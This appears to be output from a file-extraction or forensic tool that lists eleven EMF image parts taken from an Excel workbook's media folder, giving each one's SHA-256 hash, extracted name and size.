SHA-256: 618304c3982761fd8d778409117d1d40017e293445ee6ae99c44fd35d08bf906
emf_19.emf ooxml-emf OOXML EMF part: xl/media/image95.emf 1308 bytes
SHA-256: ed546167d749782c53884e33a64ea279cbef162e1303699ed22868e78820e145
emf_20.emf ooxml-emf OOXML EMF part: xl/media/image96.emf 1308 bytes
SHA-256: 62a8df3b4d83b9081e988898d254a8c1f152970097c56200e4d87d49c5624250
emf_21.emf ooxml-emf OOXML EMF part: xl/media/image97.emf 1308 bytes
SHA-256: 6cd2095c2998284e0c9f2a678d8ca920084f7a5e086c8d4418e1403f709f77c1
emf_22.emf ooxml-emf OOXML EMF part: xl/media/image98.emf 1308 bytes
SHA-256: e71ada33a663535b27b167617d1474b70f07e061bc8d049347775cf4a3310a34
emf_23.emf ooxml-emf OOXML EMF part: xl/media/image99.emf 1308 bytes
SHA-256: 1e875fd383897336927eed34ffcd95f18651bc2d58b8603099e18f07c1aecff3
emf_24.emf ooxml-emf OOXML EMF part: xl/media/image100.emf 1292 bytes
SHA-256: edc63059e461421e533c9d6d27bd1b011f20e9214aea119c018cf693c56ee3ec
emf_25.emf ooxml-emf OOXML EMF part: xl/media/image101.emf 1272 bytes
SHA-256: b06f5e05b8641cfaab6920889529e92b77aaa95d7f4f58a625e19845579a452d
emf_26.emf ooxml-emf OOXML EMF part: xl/media/image93.emf 1308 bytes
SHA-256: 9378d91a55f21f9a4084c618ab7f7466b0cdbdf123d96d7d0e2954fa6d2cddd3
emf_27.emf ooxml-emf OOXML EMF part: xl/media/image92.emf 1308 bytes
SHA-256: 313e96acf4ae1a2d0cf1f25e054e49a1484fcd9f9626ae829d7d2e8ec9ff0336
emf_28.emf ooxml-emf OOXML EMF part: xl/media/image91.emf 1280 bytes
SHA-256: ed6c336552bd94ecf4d245a5fbc662adcaaa4755666d7c740e76dab2cb4e3726
emf_29.emf ooxml-emf OOXML EMF part: xl/media/image84.emf 1272 bytes
SHA-256: 2f67e4967d46153c758168a050649995359176d898d99f888490221e1ab0ebaa